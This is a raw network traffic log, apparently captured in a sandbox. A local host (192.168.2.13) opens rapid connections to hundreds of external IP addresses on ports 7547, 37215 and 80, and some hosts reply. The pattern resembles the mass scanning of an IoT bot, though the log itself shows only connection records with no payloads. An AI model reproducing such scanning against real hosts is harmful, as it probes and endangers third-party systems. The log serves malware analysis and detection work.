                                          Nov 7, 2024 11:57:58.400835037 CET30567547192.168.2.13146.205.192.84
                                          Nov 7, 2024 11:57:58.400846958 CET7547305698.231.217.134192.168.2.13
                                          Nov 7, 2024 11:57:58.400857925 CET30567547192.168.2.1383.33.0.230
                                          Nov 7, 2024 11:57:58.400857925 CET75473056198.114.207.222192.168.2.13
                                          Nov 7, 2024 11:57:58.400860071 CET30567547192.168.2.13209.53.84.20
                                          Nov 7, 2024 11:57:58.400860071 CET3070437215192.168.2.1341.155.209.18
                                          Nov 7, 2024 11:57:58.400871992 CET3070437215192.168.2.1341.243.253.155
                                          Nov 7, 2024 11:57:58.400871992 CET75473056136.155.101.110192.168.2.13
                                          Nov 7, 2024 11:57:58.400882006 CET30567547192.168.2.1398.231.217.134
                                          Nov 7, 2024 11:57:58.400882006 CET3070437215192.168.2.1341.206.46.142
                                          Nov 7, 2024 11:57:58.400887012 CET75473056102.183.190.244192.168.2.13
                                          Nov 7, 2024 11:57:58.400887012 CET30567547192.168.2.13198.114.207.222
                                          Nov 7, 2024 11:57:58.400901079 CET3070437215192.168.2.1341.12.203.216
                                          Nov 7, 2024 11:57:58.400902033 CET7547305681.217.191.134192.168.2.13
                                          Nov 7, 2024 11:57:58.400902033 CET30567547192.168.2.13136.155.101.110
                                          Nov 7, 2024 11:57:58.400907993 CET3070437215192.168.2.1341.217.58.215
                                          Nov 7, 2024 11:57:58.400916100 CET75473056139.226.41.169192.168.2.13
                                          Nov 7, 2024 11:57:58.400923967 CET3070437215192.168.2.1341.2.136.50
                                          Nov 7, 2024 11:57:58.400923967 CET30567547192.168.2.13102.183.190.244
                                          Nov 7, 2024 11:57:58.400928020 CET3070437215192.168.2.1341.85.75.194
                                          Nov 7, 2024 11:57:58.400928020 CET75473056122.6.91.0192.168.2.13
                                          Nov 7, 2024 11:57:58.400928974 CET30567547192.168.2.1381.217.191.134
                                          Nov 7, 2024 11:57:58.400935888 CET3070437215192.168.2.1341.186.119.53
                                          Nov 7, 2024 11:57:58.400937080 CET3070437215192.168.2.1341.170.193.144
                                          Nov 7, 2024 11:57:58.400942087 CET75473056161.219.223.194192.168.2.13
                                          Nov 7, 2024 11:57:58.400944948 CET30567547192.168.2.13139.226.41.169
                                          Nov 7, 2024 11:57:58.400945902 CET3070437215192.168.2.1341.196.90.170
                                          Nov 7, 2024 11:57:58.400954962 CET7547305612.242.187.237192.168.2.13
                                          Nov 7, 2024 11:57:58.400957108 CET3070437215192.168.2.1341.161.94.247
                                          Nov 7, 2024 11:57:58.400968075 CET75473056189.116.101.14192.168.2.13
                                          Nov 7, 2024 11:57:58.400969982 CET30567547192.168.2.13122.6.91.0
                                          Nov 7, 2024 11:57:58.400970936 CET30567547192.168.2.13161.219.223.194
                                          Nov 7, 2024 11:57:58.400980949 CET75473056122.82.246.186192.168.2.13
                                          Nov 7, 2024 11:57:58.400986910 CET30567547192.168.2.1312.242.187.237
                                          Nov 7, 2024 11:57:58.400988102 CET30567547192.168.2.13189.116.101.14
                                          Nov 7, 2024 11:57:58.400995016 CET75473056105.218.157.54192.168.2.13
                                          Nov 7, 2024 11:57:58.401009083 CET75473056206.175.69.200192.168.2.13
                                          Nov 7, 2024 11:57:58.401012897 CET30567547192.168.2.13122.82.246.186
                                          Nov 7, 2024 11:57:58.401021957 CET30567547192.168.2.13105.218.157.54
                                          Nov 7, 2024 11:57:58.401024103 CET75473056151.130.41.44192.168.2.13
                                          Nov 7, 2024 11:57:58.401026964 CET3070437215192.168.2.1341.104.137.232
                                          Nov 7, 2024 11:57:58.401037931 CET75473056138.32.249.164192.168.2.13
                                          Nov 7, 2024 11:57:58.401050091 CET7547305641.149.132.171192.168.2.13
                                          Nov 7, 2024 11:57:58.401052952 CET3070437215192.168.2.1341.252.14.18
                                          Nov 7, 2024 11:57:58.401052952 CET3070437215192.168.2.1341.75.222.130
                                          Nov 7, 2024 11:57:58.401052952 CET30567547192.168.2.13151.130.41.44
                                          Nov 7, 2024 11:57:58.401062012 CET3070437215192.168.2.1341.84.184.1
                                          Nov 7, 2024 11:57:58.401063919 CET75473056142.217.21.179192.168.2.13
                                          Nov 7, 2024 11:57:58.401067019 CET30567547192.168.2.13206.175.69.200
                                          Nov 7, 2024 11:57:58.401067019 CET30567547192.168.2.13138.32.249.164
                                          Nov 7, 2024 11:57:58.401068926 CET3070437215192.168.2.1341.8.190.44
                                          Nov 7, 2024 11:57:58.401084900 CET3070437215192.168.2.1341.203.139.249
                                          Nov 7, 2024 11:57:58.401091099 CET30567547192.168.2.1341.149.132.171
                                          Nov 7, 2024 11:57:58.401096106 CET30567547192.168.2.13142.217.21.179
                                          Nov 7, 2024 11:57:58.401104927 CET3070437215192.168.2.1341.224.151.55
                                          Nov 7, 2024 11:57:58.401113033 CET3070437215192.168.2.1341.114.137.234
                                          Nov 7, 2024 11:57:58.401113987 CET3070437215192.168.2.1341.250.77.27
                                          Nov 7, 2024 11:57:58.401113033 CET3070437215192.168.2.1341.109.27.211
                                          Nov 7, 2024 11:57:58.401113987 CET3070437215192.168.2.1341.28.27.204
                                          Nov 7, 2024 11:57:58.401113987 CET3070437215192.168.2.1341.237.172.243
                                          Nov 7, 2024 11:57:58.401113987 CET3070437215192.168.2.1341.71.179.133
                                          Nov 7, 2024 11:57:58.401120901 CET3070437215192.168.2.1341.174.0.199
                                          Nov 7, 2024 11:57:58.401128054 CET3070437215192.168.2.1341.240.230.243
                                          Nov 7, 2024 11:57:58.401128054 CET3070437215192.168.2.1341.34.167.128
                                          Nov 7, 2024 11:57:58.401129007 CET7547305617.214.90.150192.168.2.13
                                          Nov 7, 2024 11:57:58.401130915 CET3070437215192.168.2.1341.231.123.230
                                          Nov 7, 2024 11:57:58.401138067 CET3070437215192.168.2.1341.117.76.39
                                          Nov 7, 2024 11:57:58.401139975 CET3070437215192.168.2.1341.20.80.169
                                          Nov 7, 2024 11:57:58.401143074 CET75473056181.145.248.159192.168.2.13
                                          Nov 7, 2024 11:57:58.401146889 CET3070437215192.168.2.1341.154.77.15
                                          Nov 7, 2024 11:57:58.401146889 CET3070437215192.168.2.1341.127.106.218
                                          Nov 7, 2024 11:57:58.401153088 CET30567547192.168.2.1317.214.90.150
                                          Nov 7, 2024 11:57:58.401156902 CET7547305623.250.76.46192.168.2.13
                                          Nov 7, 2024 11:57:58.401160955 CET3070437215192.168.2.1341.179.246.12
                                          Nov 7, 2024 11:57:58.401169062 CET30567547192.168.2.13181.145.248.159
                                          Nov 7, 2024 11:57:58.401175976 CET3070437215192.168.2.1341.253.26.101
                                          Nov 7, 2024 11:57:58.401175976 CET3070437215192.168.2.1341.178.164.195
                                          Nov 7, 2024 11:57:58.401179075 CET7547305667.154.223.116192.168.2.13
                                          Nov 7, 2024 11:57:58.401180983 CET3070437215192.168.2.1341.97.182.39
                                          Nov 7, 2024 11:57:58.401191950 CET7547305640.244.4.138192.168.2.13
                                          Nov 7, 2024 11:57:58.401192904 CET30567547192.168.2.1323.250.76.46
                                          Nov 7, 2024 11:57:58.401196003 CET3070437215192.168.2.1341.39.87.0
                                          Nov 7, 2024 11:57:58.401204109 CET30567547192.168.2.1367.154.223.116
                                          Nov 7, 2024 11:57:58.401206970 CET7547305645.134.69.66192.168.2.13
                                          Nov 7, 2024 11:57:58.401218891 CET3070437215192.168.2.1341.94.3.95
                                          Nov 7, 2024 11:57:58.401220083 CET75473056174.5.136.118192.168.2.13
                                          Nov 7, 2024 11:57:58.401220083 CET3070437215192.168.2.1341.55.60.233
                                          Nov 7, 2024 11:57:58.401221037 CET30567547192.168.2.1340.244.4.138
                                          Nov 7, 2024 11:57:58.401230097 CET3070437215192.168.2.1341.221.100.45
                                          Nov 7, 2024 11:57:58.401233912 CET75473056207.143.254.155192.168.2.13
                                          Nov 7, 2024 11:57:58.401247025 CET7547305662.246.234.161192.168.2.13
                                          Nov 7, 2024 11:57:58.401248932 CET30567547192.168.2.1345.134.69.66
                                          Nov 7, 2024 11:57:58.401252031 CET30567547192.168.2.13174.5.136.118
                                          Nov 7, 2024 11:57:58.401261091 CET75473056181.254.232.178192.168.2.13
                                          Nov 7, 2024 11:57:58.401266098 CET3070437215192.168.2.1341.185.153.140
                                          Nov 7, 2024 11:57:58.401268005 CET3070437215192.168.2.1341.128.108.245
                                          Nov 7, 2024 11:57:58.401268005 CET30567547192.168.2.13207.143.254.155
                                          Nov 7, 2024 11:57:58.401268005 CET3070437215192.168.2.1341.89.87.230
                                          Nov 7, 2024 11:57:58.401274920 CET75473056161.112.138.16192.168.2.13
                                          Nov 7, 2024 11:57:58.401276112 CET3070437215192.168.2.1341.59.223.146
                                          Nov 7, 2024 11:57:58.401277065 CET3070437215192.168.2.1341.103.173.170
                                          Nov 7, 2024 11:57:58.401276112 CET30567547192.168.2.1362.246.234.161
                                          Nov 7, 2024 11:57:58.401283979 CET3070437215192.168.2.1341.137.231.137
                                          Nov 7, 2024 11:57:58.401287079 CET30567547192.168.2.13181.254.232.178
                                          Nov 7, 2024 11:57:58.401289940 CET7547305676.216.165.50192.168.2.13
                                          Nov 7, 2024 11:57:58.401289940 CET3070437215192.168.2.1341.173.40.3
                                          Nov 7, 2024 11:57:58.401304007 CET30567547192.168.2.13161.112.138.16
                                          Nov 7, 2024 11:57:58.401304960 CET75473056109.87.8.154192.168.2.13
                                          Nov 7, 2024 11:57:58.401304960 CET3070437215192.168.2.1341.135.95.122
                                          Nov 7, 2024 11:57:58.401315928 CET30567547192.168.2.1376.216.165.50
                                          Nov 7, 2024 11:57:58.401321888 CET7547305693.157.221.47192.168.2.13
                                          Nov 7, 2024 11:57:58.401335001 CET75473056149.229.198.203192.168.2.13
                                          Nov 7, 2024 11:57:58.401341915 CET30567547192.168.2.1393.157.221.47
                                          Nov 7, 2024 11:57:58.401343107 CET30567547192.168.2.13109.87.8.154
                                          Nov 7, 2024 11:57:58.401345968 CET7547305671.35.26.107192.168.2.13
                                          Nov 7, 2024 11:57:58.401360035 CET7547305618.208.110.54192.168.2.13
                                          Nov 7, 2024 11:57:58.401364088 CET3070437215192.168.2.1341.174.121.31
                                          Nov 7, 2024 11:57:58.401366949 CET30567547192.168.2.13149.229.198.203
                                          Nov 7, 2024 11:57:58.401372910 CET754730565.206.100.61192.168.2.13
                                          Nov 7, 2024 11:57:58.401376963 CET30567547192.168.2.1371.35.26.107
                                          Nov 7, 2024 11:57:58.401386976 CET30567547192.168.2.1318.208.110.54
                                          Nov 7, 2024 11:57:58.401388884 CET7547305684.34.165.116192.168.2.13
                                          Nov 7, 2024 11:57:58.401405096 CET30567547192.168.2.135.206.100.61
                                          Nov 7, 2024 11:57:58.401411057 CET75473056102.223.247.70192.168.2.13
                                          Nov 7, 2024 11:57:58.401424885 CET75473056125.194.192.74192.168.2.13
                                          Nov 7, 2024 11:57:58.401432037 CET30567547192.168.2.1384.34.165.116
                                          Nov 7, 2024 11:57:58.401434898 CET3070437215192.168.2.1341.24.35.122
                                          Nov 7, 2024 11:57:58.401437044 CET75473056207.209.81.34192.168.2.13
                                          Nov 7, 2024 11:57:58.401439905 CET3070437215192.168.2.1341.189.147.184
                                          Nov 7, 2024 11:57:58.401441097 CET3070437215192.168.2.1341.136.131.7
                                          Nov 7, 2024 11:57:58.401441097 CET30567547192.168.2.13102.223.247.70
                                          Nov 7, 2024 11:57:58.401448011 CET3070437215192.168.2.1341.16.239.190
                                          Nov 7, 2024 11:57:58.401449919 CET30567547192.168.2.13125.194.192.74
                                          Nov 7, 2024 11:57:58.401451111 CET75473056149.127.49.65192.168.2.13
                                          Nov 7, 2024 11:57:58.401460886 CET3070437215192.168.2.1341.168.57.5
                                          Nov 7, 2024 11:57:58.401464939 CET30567547192.168.2.13207.209.81.34
                                          Nov 7, 2024 11:57:58.401464939 CET3070437215192.168.2.1341.90.30.249
                                          Nov 7, 2024 11:57:58.401467085 CET754730561.113.107.184192.168.2.13
                                          Nov 7, 2024 11:57:58.401479959 CET7547305694.10.25.57192.168.2.13
                                          Nov 7, 2024 11:57:58.401483059 CET3070437215192.168.2.1341.130.65.65
                                          Nov 7, 2024 11:57:58.401484966 CET3070437215192.168.2.1341.215.255.201
                                          Nov 7, 2024 11:57:58.401485920 CET30567547192.168.2.13149.127.49.65
                                          Nov 7, 2024 11:57:58.401485920 CET3070437215192.168.2.1341.60.12.160
                                          Nov 7, 2024 11:57:58.401490927 CET7547305642.178.122.143192.168.2.13
                                          Nov 7, 2024 11:57:58.401496887 CET3070437215192.168.2.1341.131.1.250
                                          Nov 7, 2024 11:57:58.401496887 CET30567547192.168.2.131.113.107.184
                                          Nov 7, 2024 11:57:58.401496887 CET30567547192.168.2.1394.10.25.57
                                          Nov 7, 2024 11:57:58.401504040 CET75473056137.154.21.117192.168.2.13
                                          Nov 7, 2024 11:57:58.401516914 CET75473056150.159.43.61192.168.2.13
                                          Nov 7, 2024 11:57:58.401523113 CET30567547192.168.2.1342.178.122.143
                                          Nov 7, 2024 11:57:58.401531935 CET3070437215192.168.2.1341.204.14.180
                                          Nov 7, 2024 11:57:58.401554108 CET3070437215192.168.2.1341.126.21.165
                                          Nov 7, 2024 11:57:58.401556969 CET3070437215192.168.2.1341.83.78.166
                                          Nov 7, 2024 11:57:58.401556969 CET3070437215192.168.2.1341.7.216.226
                                          Nov 7, 2024 11:57:58.401556015 CET30567547192.168.2.13137.154.21.117
                                          Nov 7, 2024 11:57:58.401560068 CET3070437215192.168.2.1341.93.136.32
                                          Nov 7, 2024 11:57:58.401560068 CET3070437215192.168.2.1341.113.129.23
                                          Nov 7, 2024 11:57:58.401560068 CET3070437215192.168.2.1341.182.44.52
                                          Nov 7, 2024 11:57:58.401560068 CET3070437215192.168.2.1341.51.204.81
                                          Nov 7, 2024 11:57:58.401561022 CET30567547192.168.2.13150.159.43.61
                                          Nov 7, 2024 11:57:58.401566029 CET3070437215192.168.2.1341.226.18.8
                                          Nov 7, 2024 11:57:58.401571989 CET3070437215192.168.2.1341.34.239.247
                                          Nov 7, 2024 11:57:58.401576042 CET228880192.168.2.13206.6.180.55
                                          Nov 7, 2024 11:57:58.401576042 CET3070437215192.168.2.1341.212.203.148
                                          Nov 7, 2024 11:57:58.401578903 CET3070437215192.168.2.1341.189.71.248
                                          Nov 7, 2024 11:57:58.401585102 CET3070437215192.168.2.1341.198.105.94
                                          Nov 7, 2024 11:57:58.401585102 CET3070437215192.168.2.1341.1.173.246
                                          Nov 7, 2024 11:57:58.401592016 CET228880192.168.2.13206.195.183.55
                                          Nov 7, 2024 11:57:58.401599884 CET3070437215192.168.2.1341.28.3.238
                                          Nov 7, 2024 11:57:58.401603937 CET3070437215192.168.2.1341.73.39.4
                                          Nov 7, 2024 11:57:58.401621103 CET3070437215192.168.2.1341.1.100.252
                                          Nov 7, 2024 11:57:58.401621103 CET3070437215192.168.2.1341.33.102.182
                                          Nov 7, 2024 11:57:58.401648045 CET228880192.168.2.13206.247.208.148
                                          Nov 7, 2024 11:57:58.401653051 CET3070437215192.168.2.1341.43.198.3
                                          Nov 7, 2024 11:57:58.401653051 CET228880192.168.2.13206.146.165.53
                                          Nov 7, 2024 11:57:58.401659966 CET3070437215192.168.2.1341.3.17.218
                                          Nov 7, 2024 11:57:58.401662111 CET228880192.168.2.13206.207.174.18
                                          Nov 7, 2024 11:57:58.401671886 CET3070437215192.168.2.1341.248.16.141
                                          Nov 7, 2024 11:57:58.401673079 CET3070437215192.168.2.1341.63.137.189
                                          Nov 7, 2024 11:57:58.401674986 CET7547305692.71.13.55192.168.2.13
                                          Nov 7, 2024 11:57:58.401679039 CET3070437215192.168.2.1341.69.159.122
                                          Nov 7, 2024 11:57:58.401679039 CET3070437215192.168.2.1341.28.130.54
                                          Nov 7, 2024 11:57:58.401685953 CET228880192.168.2.13206.245.104.153
                                          Nov 7, 2024 11:57:58.401704073 CET3070437215192.168.2.1341.202.171.159
                                          Nov 7, 2024 11:57:58.401704073 CET3070437215192.168.2.1341.173.6.122
                                          Nov 7, 2024 11:57:58.401704073 CET3070437215192.168.2.1341.150.109.115
                                          Nov 7, 2024 11:57:58.401705980 CET3070437215192.168.2.1341.112.3.124
                                          Nov 7, 2024 11:57:58.401705980 CET3070437215192.168.2.1341.245.178.74
                                          Nov 7, 2024 11:57:58.401710033 CET75473056145.247.3.152192.168.2.13
                                          Nov 7, 2024 11:57:58.401710987 CET30567547192.168.2.1392.71.13.55
                                          Nov 7, 2024 11:57:58.401711941 CET3070437215192.168.2.1341.88.217.62
                                          Nov 7, 2024 11:57:58.401722908 CET3070437215192.168.2.1341.109.161.91
                                          Nov 7, 2024 11:57:58.401724100 CET7547305687.171.109.161192.168.2.13
                                          Nov 7, 2024 11:57:58.401736021 CET754730561.145.112.25192.168.2.13
                                          Nov 7, 2024 11:57:58.401740074 CET30567547192.168.2.13145.247.3.152
                                          Nov 7, 2024 11:57:58.401750088 CET7547305675.147.210.179192.168.2.13
                                          Nov 7, 2024 11:57:58.401752949 CET3070437215192.168.2.1341.18.211.110
                                          Nov 7, 2024 11:57:58.401753902 CET30567547192.168.2.1387.171.109.161
                                          Nov 7, 2024 11:57:58.401762962 CET30567547192.168.2.131.145.112.25
                                          Nov 7, 2024 11:57:58.401762962 CET75473056204.67.131.9192.168.2.13
                                          Nov 7, 2024 11:57:58.401763916 CET228880192.168.2.13206.141.162.73
                                          Nov 7, 2024 11:57:58.401767969 CET3070437215192.168.2.1341.203.108.14
                                          Nov 7, 2024 11:57:58.401773930 CET3070437215192.168.2.1341.44.79.173
                                          Nov 7, 2024 11:57:58.401777029 CET3070437215192.168.2.1341.178.182.167
                                          Nov 7, 2024 11:57:58.401777983 CET228880192.168.2.13206.108.78.55
                                          Nov 7, 2024 11:57:58.401781082 CET30567547192.168.2.1375.147.210.179
                                          Nov 7, 2024 11:57:58.401782036 CET75473056130.125.127.213192.168.2.13
                                          Nov 7, 2024 11:57:58.401794910 CET75473056217.174.0.91192.168.2.13
                                          Nov 7, 2024 11:57:58.401794910 CET3070437215192.168.2.1341.84.111.216
                                          Nov 7, 2024 11:57:58.401796103 CET3070437215192.168.2.1341.225.114.214
                                          Nov 7, 2024 11:57:58.401798964 CET30567547192.168.2.13204.67.131.9
                                          Nov 7, 2024 11:57:58.401808023 CET7547305668.107.67.8192.168.2.13
                                          Nov 7, 2024 11:57:58.401808977 CET3070437215192.168.2.1341.86.175.120
                                          Nov 7, 2024 11:57:58.401808977 CET228880192.168.2.13206.115.43.236
                                          Nov 7, 2024 11:57:58.401810884 CET3070437215192.168.2.1341.105.140.230
                                          Nov 7, 2024 11:57:58.401819944 CET75473056166.145.91.198192.168.2.13
                                          Nov 7, 2024 11:57:58.401822090 CET30567547192.168.2.13130.125.127.213
                                          Nov 7, 2024 11:57:58.401824951 CET3070437215192.168.2.1341.194.111.23
                                          Nov 7, 2024 11:57:58.401824951 CET30567547192.168.2.13217.174.0.91
                                          Nov 7, 2024 11:57:58.401824951 CET3070437215192.168.2.1341.133.49.186
                                          Nov 7, 2024 11:57:58.401834011 CET75473056107.169.79.135192.168.2.13
                                          Nov 7, 2024 11:57:58.401835918 CET3070437215192.168.2.1341.96.219.110
                                          Nov 7, 2024 11:57:58.401846886 CET7547305693.217.5.58192.168.2.13
                                          Nov 7, 2024 11:57:58.401856899 CET30567547192.168.2.1368.107.67.8
                                          Nov 7, 2024 11:57:58.401856899 CET3070437215192.168.2.1341.242.198.228
                                          Nov 7, 2024 11:57:58.401859045 CET30567547192.168.2.13166.145.91.198
                                          Nov 7, 2024 11:57:58.401859999 CET3070437215192.168.2.1341.52.118.111
                                          Nov 7, 2024 11:57:58.401863098 CET30567547192.168.2.13107.169.79.135
                                          Nov 7, 2024 11:57:58.401868105 CET7547305624.59.35.41192.168.2.13
                                          Nov 7, 2024 11:57:58.401870966 CET3070437215192.168.2.1341.87.37.10
                                          Nov 7, 2024 11:57:58.401870966 CET3070437215192.168.2.1341.213.60.188
                                          Nov 7, 2024 11:57:58.401870966 CET3070437215192.168.2.1341.130.225.146
                                          Nov 7, 2024 11:57:58.401870966 CET3070437215192.168.2.1341.29.28.67
                                          Nov 7, 2024 11:57:58.401871920 CET3070437215192.168.2.1341.88.252.19
                                          Nov 7, 2024 11:57:58.401876926 CET3070437215192.168.2.1341.173.28.8
                                          Nov 7, 2024 11:57:58.401879072 CET3070437215192.168.2.1341.138.47.62
                                          Nov 7, 2024 11:57:58.401880026 CET30567547192.168.2.1393.217.5.58
                                          Nov 7, 2024 11:57:58.401880980 CET75473056200.82.169.159192.168.2.13
                                          Nov 7, 2024 11:57:58.401894093 CET75473056157.232.240.29192.168.2.13
                                          Nov 7, 2024 11:57:58.401896954 CET30567547192.168.2.1324.59.35.41
                                          Nov 7, 2024 11:57:58.401900053 CET75473056191.178.92.67192.168.2.13
                                          Nov 7, 2024 11:57:58.401901007 CET228880192.168.2.13206.254.220.203
                                          Nov 7, 2024 11:57:58.401906967 CET75473056131.228.93.220192.168.2.13
                                          Nov 7, 2024 11:57:58.401907921 CET228880192.168.2.13206.73.161.10
                                          Nov 7, 2024 11:57:58.401909113 CET30567547192.168.2.13200.82.169.159
                                          Nov 7, 2024 11:57:58.401913881 CET75473056199.48.33.72192.168.2.13
                                          Nov 7, 2024 11:57:58.401921034 CET30567547192.168.2.13157.232.240.29
                                          Nov 7, 2024 11:57:58.401928902 CET7547305617.211.208.78192.168.2.13
                                          Nov 7, 2024 11:57:58.401931047 CET30567547192.168.2.13191.178.92.67
                                          Nov 7, 2024 11:57:58.401932955 CET30567547192.168.2.13131.228.93.220
                                          Nov 7, 2024 11:57:58.401942015 CET75473056197.215.242.154192.168.2.13
                                          Nov 7, 2024 11:57:58.401951075 CET3070437215192.168.2.1341.224.175.212
                                          Nov 7, 2024 11:57:58.401954889 CET30567547192.168.2.13199.48.33.72
                                          Nov 7, 2024 11:57:58.401954889 CET75473056156.91.165.67192.168.2.13
                                          Nov 7, 2024 11:57:58.401954889 CET3070437215192.168.2.1341.182.85.126
                                          Nov 7, 2024 11:57:58.401962996 CET3070437215192.168.2.1341.78.91.95
                                          Nov 7, 2024 11:57:58.401968956 CET7547305677.29.129.35192.168.2.13
                                          Nov 7, 2024 11:57:58.401973963 CET30567547192.168.2.1317.211.208.78
                                          Nov 7, 2024 11:57:58.401977062 CET30567547192.168.2.13197.215.242.154
                                          Nov 7, 2024 11:57:58.401981115 CET75473056133.238.123.52192.168.2.13
                                          Nov 7, 2024 11:57:58.401983976 CET228880192.168.2.13206.55.1.16
                                          Nov 7, 2024 11:57:58.401988983 CET228880192.168.2.13206.109.42.156
                                          Nov 7, 2024 11:57:58.401988983 CET228880192.168.2.13206.203.107.152
                                          Nov 7, 2024 11:57:58.401989937 CET3070437215192.168.2.1341.41.219.253
                                          Nov 7, 2024 11:57:58.401993990 CET75473056119.238.254.150192.168.2.13
                                          Nov 7, 2024 11:57:58.401998043 CET228880192.168.2.13206.183.17.245
                                          Nov 7, 2024 11:57:58.401998043 CET30567547192.168.2.1377.29.129.35
                                          Nov 7, 2024 11:57:58.401998997 CET228880192.168.2.13206.63.92.197
                                          Nov 7, 2024 11:57:58.402000904 CET75473056157.249.210.82192.168.2.13
                                          Nov 7, 2024 11:57:58.401998043 CET30567547192.168.2.13156.91.165.67
                                          Nov 7, 2024 11:57:58.402008057 CET7547305658.236.182.82192.168.2.13
                                          Nov 7, 2024 11:57:58.402017117 CET75473056221.17.179.51192.168.2.13
                                          Nov 7, 2024 11:57:58.402017117 CET3070437215192.168.2.1341.189.157.103
                                          Nov 7, 2024 11:57:58.402019978 CET228880192.168.2.13206.4.246.87
                                          Nov 7, 2024 11:57:58.402021885 CET228880192.168.2.13206.17.47.26
                                          Nov 7, 2024 11:57:58.402023077 CET75473056166.87.108.156192.168.2.13
                                          Nov 7, 2024 11:57:58.402023077 CET3070437215192.168.2.1341.54.185.14
                                          Nov 7, 2024 11:57:58.402029991 CET228880192.168.2.13206.161.20.208
                                          Nov 7, 2024 11:57:58.402029991 CET3070437215192.168.2.1341.125.169.227
                                          Nov 7, 2024 11:57:58.402040958 CET30567547192.168.2.13157.249.210.82
                                          Nov 7, 2024 11:57:58.402041912 CET30567547192.168.2.13133.238.123.52
                                          Nov 7, 2024 11:57:58.402041912 CET30567547192.168.2.13119.238.254.150
                                          Nov 7, 2024 11:57:58.402045012 CET30567547192.168.2.1358.236.182.82
                                          Nov 7, 2024 11:57:58.402051926 CET30567547192.168.2.13166.87.108.156
                                          Nov 7, 2024 11:57:58.402053118 CET30567547192.168.2.13221.17.179.51
                                          Nov 7, 2024 11:57:58.402067900 CET3070437215192.168.2.1341.78.219.48
                                          Nov 7, 2024 11:57:58.402070999 CET3070437215192.168.2.1341.243.252.76
                                          Nov 7, 2024 11:57:58.402070999 CET75473056218.221.172.64192.168.2.13
                                          Nov 7, 2024 11:57:58.402079105 CET228880192.168.2.13206.49.19.195
                                          Nov 7, 2024 11:57:58.402096987 CET3070437215192.168.2.1341.92.17.133
                                          Nov 7, 2024 11:57:58.402105093 CET30567547192.168.2.13218.221.172.64
                                          Nov 7, 2024 11:57:58.402120113 CET3070437215192.168.2.1341.47.226.115
                                          Nov 7, 2024 11:57:58.402121067 CET3070437215192.168.2.1341.41.108.140
                                          Nov 7, 2024 11:57:58.402129889 CET228880192.168.2.13206.74.172.144
                                          Nov 7, 2024 11:57:58.402132034 CET3070437215192.168.2.1341.40.201.33
                                          Nov 7, 2024 11:57:58.402132034 CET3070437215192.168.2.1341.76.124.113
                                          Nov 7, 2024 11:57:58.402132034 CET228880192.168.2.13206.118.46.230
                                          Nov 7, 2024 11:57:58.402133942 CET228880192.168.2.13206.25.208.179
                                          Nov 7, 2024 11:57:58.402134895 CET3070437215192.168.2.1341.173.235.177
                                          Nov 7, 2024 11:57:58.402139902 CET3070437215192.168.2.1341.21.102.182
                                          Nov 7, 2024 11:57:58.402143955 CET3070437215192.168.2.1341.135.58.140
                                          Nov 7, 2024 11:57:58.402146101 CET3070437215192.168.2.1341.242.176.113
                                          Nov 7, 2024 11:57:58.402146101 CET3070437215192.168.2.1341.242.110.205
                                          Nov 7, 2024 11:57:58.402151108 CET228880192.168.2.13206.90.183.227
                                          Nov 7, 2024 11:57:58.402151108 CET3070437215192.168.2.1341.7.97.66
                                          Nov 7, 2024 11:57:58.402160883 CET3070437215192.168.2.1341.142.154.22
                                          Nov 7, 2024 11:57:58.402162075 CET3070437215192.168.2.1341.247.27.151
                                          Nov 7, 2024 11:57:58.402192116 CET228880192.168.2.13206.119.127.52
                                          Nov 7, 2024 11:57:58.402194023 CET7547305685.55.214.128192.168.2.13
                                          Nov 7, 2024 11:57:58.402201891 CET228880192.168.2.13206.65.169.159
                                          Nov 7, 2024 11:57:58.402206898 CET75473056200.114.159.189192.168.2.13
                                          Nov 7, 2024 11:57:58.402220011 CET75473056221.141.7.155192.168.2.13
                                          Nov 7, 2024 11:57:58.402225018 CET30567547192.168.2.1385.55.214.128
                                          Nov 7, 2024 11:57:58.402232885 CET75473056195.48.157.176192.168.2.13
                                          Nov 7, 2024 11:57:58.402239084 CET30567547192.168.2.13200.114.159.189
                                          Nov 7, 2024 11:57:58.402245998 CET75473056179.150.138.150192.168.2.13
                                          Nov 7, 2024 11:57:58.402249098 CET30567547192.168.2.13221.141.7.155
                                          Nov 7, 2024 11:57:58.402259111 CET7547305649.196.193.139192.168.2.13
                                          Nov 7, 2024 11:57:58.402261972 CET30567547192.168.2.13195.48.157.176
                                          Nov 7, 2024 11:57:58.402271986 CET7547305685.221.170.120192.168.2.13
                                          Nov 7, 2024 11:57:58.402276993 CET228880192.168.2.13206.86.110.56
                                          Nov 7, 2024 11:57:58.402277946 CET30567547192.168.2.13179.150.138.150
                                          Nov 7, 2024 11:57:58.402277946 CET228880192.168.2.13206.149.74.84
                                          Nov 7, 2024 11:57:58.402278900 CET228880192.168.2.13206.56.52.134
                                          Nov 7, 2024 11:57:58.402287006 CET7547305646.106.167.189192.168.2.13
                                          Nov 7, 2024 11:57:58.402295113 CET30567547192.168.2.1349.196.193.139
                                          Nov 7, 2024 11:57:58.402299881 CET75473056169.87.100.137192.168.2.13
                                          Nov 7, 2024 11:57:58.402307034 CET30567547192.168.2.1385.221.170.120
                                          Nov 7, 2024 11:57:58.402316093 CET75473056130.164.70.223192.168.2.13
                                          Nov 7, 2024 11:57:58.402317047 CET30567547192.168.2.1346.106.167.189
                                          Nov 7, 2024 11:57:58.402331114 CET75473056151.4.215.224192.168.2.13
                                          Nov 7, 2024 11:57:58.402343035 CET7547305632.218.45.152192.168.2.13
                                          Nov 7, 2024 11:57:58.402345896 CET30567547192.168.2.13130.164.70.223
                                          Nov 7, 2024 11:57:58.402355909 CET30567547192.168.2.13151.4.215.224
                                          Nov 7, 2024 11:57:58.402359009 CET30567547192.168.2.13169.87.100.137
                                          Nov 7, 2024 11:57:58.402365923 CET7547305617.8.239.209192.168.2.13
                                          Nov 7, 2024 11:57:58.402378082 CET7547305643.20.114.97192.168.2.13
                                          Nov 7, 2024 11:57:58.402381897 CET228880192.168.2.13206.116.93.201
                                          Nov 7, 2024 11:57:58.402390957 CET75473056154.59.51.205192.168.2.13
                                          Nov 7, 2024 11:57:58.402394056 CET30567547192.168.2.1332.218.45.152
                                          Nov 7, 2024 11:57:58.402394056 CET30567547192.168.2.1317.8.239.209
                                          Nov 7, 2024 11:57:58.402404070 CET7547305618.125.64.245192.168.2.13
                                          Nov 7, 2024 11:57:58.402406931 CET30567547192.168.2.1343.20.114.97
                                          Nov 7, 2024 11:57:58.402406931 CET228880192.168.2.13206.137.150.230
                                          Nov 7, 2024 11:57:58.402412891 CET228880192.168.2.13206.47.45.2
                                          Nov 7, 2024 11:57:58.402412891 CET228880192.168.2.13206.24.103.182
